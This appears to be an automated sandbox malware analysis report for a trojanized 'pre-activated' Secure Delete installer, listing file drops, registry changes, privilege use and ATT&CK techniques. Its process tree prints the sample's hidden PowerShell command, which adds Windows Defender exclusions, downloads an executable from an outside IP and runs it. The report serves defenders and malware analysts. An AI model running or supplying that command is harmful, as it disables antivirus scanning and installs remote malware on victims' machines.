c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578

Analysis

max time kernel
16s
max time network
17s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
03/01/2025, 21:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe
Size

3.2MB
MD5

77d75d34a217ca48d26b72d6bf8dedb0
SHA1

9a623c8553fec5ccceb7b0de3d1b828da3a49ac2
SHA256

c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578
SHA512

0334623cf7192350bfb8f15a02b273d9cc8e9504f8a04aab0db29e4bfa25e1cc36f35fa2017da73a331caad6aaa893b4b99c9e891071f3b43959f4ad000f53bc
SSDEEP

98304:j3Gv5mmQ4yVPgp5qG8AbuF+taoPKN494tP+DLA1s2x:j3Gv5mmQ4yVPgp5qG8AbuF+ta+KN4yt9

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe
2796	powershell.exe
2796	powershell.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\en.txt	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\ar.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\pt.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Interface\ui_minButton_flat.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\fr.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\es.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\activationkeys.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\subscribe2.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\fr.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Framework\Languages\ar.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\ru.txt	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\ko.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\en.png	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Framework\Languages\nl.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\hu.png	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Framework\Languages\zh.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Application\Languages\es.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\nl.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\ko.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\zh.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\zh.txt	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\es.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\zh.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\zh.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\pro_menu.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\SecureDelete.exe	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\en.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\pt.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\pt.txt	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\it.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\pro.png	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Application\Languages\zh.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Application\Languages\fr.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\hu.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\cs.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\pl.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\pro-223-440.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Interface\colors.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\nl.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\ru.png	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Application\Languages\de.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\ru.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\pt.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\version-information.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\template1.bin	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\FunProMessages\ko.txt	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages-flags\de.png	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Framework\Languages\es.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\unins000.dat	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\en.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Framework\Languages\ru.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Framework\Languages\el.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Application\Languages\pl.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Interface\ui_closeButton_hover.png	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\update.png	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Framework\Languages\it.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\hu.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\subscribe1.png	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Application\Languages\ru.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\version-information.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Secure Delete\Application\Languages\cs.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\SecureDelete.exe.config	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\Languages\es.ini	msiexec.exe
File created	C:\Program Files (x86)\Secure Delete\Framework\UForms\pro-250-241.png	msiexec.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f76c439.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete2.exe	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\Installer\f76c439.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete.exe	msiexec.exe
File created	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\ARPPRODUCTICON.ico	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSIC513.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\ARPPRODUCTICON.ico	msiexec.exe
File created	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete1.exe	msiexec.exe
File created	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete2.exe	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Installer\f76c43a.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\SecureDelete1.exe	msiexec.exe
File created	C:\Windows\Installer\f76c43c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f76c43a.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe

Modifies registry class 23 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Net\1 = "C:\\Users\\Public\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\ProductName = "Secure Delete 2316.00 Préactivé"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Language = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A0B35D785907D0540800C40B63A69252	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\LastUsedSource = "n;1;C:\\Users\\Public\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9A84B56E11AC4ED4E94452AA65AC42BC	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\ProductIcon = "C:\\Windows\\Installer\\{E65B48A9-CA11-4DE4-9E44-25AA56CA24CB}\\ARPPRODUCTICON.ico"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\PackageName = "setup.msi"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\PackageCode = "F0774D97359D7E04CB472604A052589A"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A0B35D785907D0540800C40B63A69252\9A84B56E11AC4ED4E94452AA65AC42BC	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9A84B56E11AC4ED4E94452AA65AC42BC\Complete	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9A84B56E11AC4ED4E94452AA65AC42BC\Version = "201326592"	msiexec.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2792	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2792	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeSecurityPrivilege	2700	msiexec.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeCreateTokenPrivilege	2792	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2792	msiexec.exe
Token: SeLockMemoryPrivilege	2792	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2792	msiexec.exe
Token: SeMachineAccountPrivilege	2792	msiexec.exe
Token: SeTcbPrivilege	2792	msiexec.exe
Token: SeSecurityPrivilege	2792	msiexec.exe
Token: SeTakeOwnershipPrivilege	2792	msiexec.exe
Token: SeLoadDriverPrivilege	2792	msiexec.exe
Token: SeSystemProfilePrivilege	2792	msiexec.exe
Token: SeSystemtimePrivilege	2792	msiexec.exe
Token: SeProfSingleProcessPrivilege	2792	msiexec.exe
Token: SeIncBasePriorityPrivilege	2792	msiexec.exe
Token: SeCreatePagefilePrivilege	2792	msiexec.exe
Token: SeCreatePermanentPrivilege	2792	msiexec.exe
Token: SeBackupPrivilege	2792	msiexec.exe
Token: SeRestorePrivilege	2792	msiexec.exe
Token: SeShutdownPrivilege	2792	msiexec.exe
Token: SeDebugPrivilege	2792	msiexec.exe
Token: SeAuditPrivilege	2792	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2792	msiexec.exe
Token: SeChangeNotifyPrivilege	2792	msiexec.exe
Token: SeRemoteShutdownPrivilege	2792	msiexec.exe
Token: SeUndockPrivilege	2792	msiexec.exe
Token: SeSyncAgentPrivilege	2792	msiexec.exe
Token: SeEnableDelegationPrivilege	2792	msiexec.exe
Token: SeManageVolumePrivilege	2792	msiexec.exe
Token: SeImpersonatePrivilege	2792	msiexec.exe
Token: SeCreateGlobalPrivilege	2792	msiexec.exe
Token: SeBackupPrivilege	2720	vssvc.exe
Token: SeRestorePrivilege	2720	vssvc.exe
Token: SeAuditPrivilege	2720	vssvc.exe
Token: SeBackupPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	596	DrvInst.exe
Token: SeRestorePrivilege	596	DrvInst.exe
Token: SeRestorePrivilege	596	DrvInst.exe
Token: SeRestorePrivilege	596	DrvInst.exe
Token: SeRestorePrivilege	596	DrvInst.exe
Token: SeRestorePrivilege	596	DrvInst.exe
Token: SeRestorePrivilege	596	DrvInst.exe
Token: SeLoadDriverPrivilege	596	DrvInst.exe
Token: SeLoadDriverPrivilege	596	DrvInst.exe
Token: SeLoadDriverPrivilege	596	DrvInst.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2792	msiexec.exe
2792	msiexec.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1876 wrote to memory of 2148	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	30
PID 1876 wrote to memory of 2148	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	30
PID 1876 wrote to memory of 2148	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	30
PID 1876 wrote to memory of 2792	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	32
PID 1876 wrote to memory of 2792	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	32
PID 1876 wrote to memory of 2792	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	32
PID 1876 wrote to memory of 2792	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	32
PID 1876 wrote to memory of 2792	1876	c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe	32
PID 2148 wrote to memory of 2140	2148	cmd.exe	33
PID 2148 wrote to memory of 2140	2148	cmd.exe	33
PID 2148 wrote to memory of 2140	2148	cmd.exe	33
PID 2140 wrote to memory of 2816	2140	net.exe	34
PID 2140 wrote to memory of 2816	2140	net.exe	34
PID 2140 wrote to memory of 2816	2140	net.exe	34
PID 2148 wrote to memory of 2796	2148	cmd.exe	35
PID 2148 wrote to memory of 2796	2148	cmd.exe	35
PID 2148 wrote to memory of 2796	2148	cmd.exe	35

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe
"C:\Users\Admin\AppData\Local\Temp\c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1876
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Public\sd895CEfer.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:2816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public\Documents;Invoke-WebRequest 185.148.3.216/5fr5gthkjdg71 -OutFile 5fr5gthkjdg71.exe;./5fr5gthkjdg71.exe;exit
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Public\setup.msi"
  2⤵
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2792

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005DC" "00000000000005A0"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f76c43b.rbs

Filesize
415KB

MD5
4908becf2f0ae6c7ee9ea303321471a5

SHA1
11606d466d1b93e597725899088648c2edb73347

SHA256
25053feef34d826bc17b3c67836d93e5df1272911ee55d63be4508dd4251ffbd

SHA512
d1718a2da526f47cc2df920176db73d08bb557d8d904f6f55a98de7d8208478188be168b36eb82b47be9110cef259a7e352e146b6a34ecfc9141ae6e13b59ad4

Download Submit
C:\Program Files (x86)\Secure Delete\Application\Languages\cs.ini

Filesize
3KB

MD5
5bd2daadcc95d02b313ab408f69c0cdd

SHA1
